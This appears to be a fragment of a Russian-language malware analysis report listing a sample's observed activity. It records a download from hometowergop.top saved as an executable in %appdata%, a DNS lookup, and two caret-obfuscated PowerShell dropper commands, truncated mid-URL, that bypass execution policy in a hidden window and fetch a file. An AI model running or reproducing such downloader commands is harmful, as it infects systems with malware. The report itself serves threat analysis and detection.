Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Pow^eR^S^hEll^.E^XE -^E^xEC^u^T^ioNPOli^Cy ^By^Pas^S -^NOP^ROFIL^E -wINdO^W^STyL^e^ HiDden (nEw^-OBJecT ^sY^st^E^M.Ne^T^.WeBc^li^e^n^t^).D^O^wN^lo^AdfI^le^('http://hometowerg...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /C "Pow^eR^S^hEll^.E^XE -^E^xEC^u^T^ioNPOli^Cy ^By^Pas^S -^NOP^ROFIL^E -wINdO^W^STyL^e^ HiDden (nEw^-OBJecT ^sY^st^E^M.Ne^T^.WeBc^li^e^n^t^).D^O^wN^lo^AdfI^le^('http://hometowerg...' (со скрытым окном)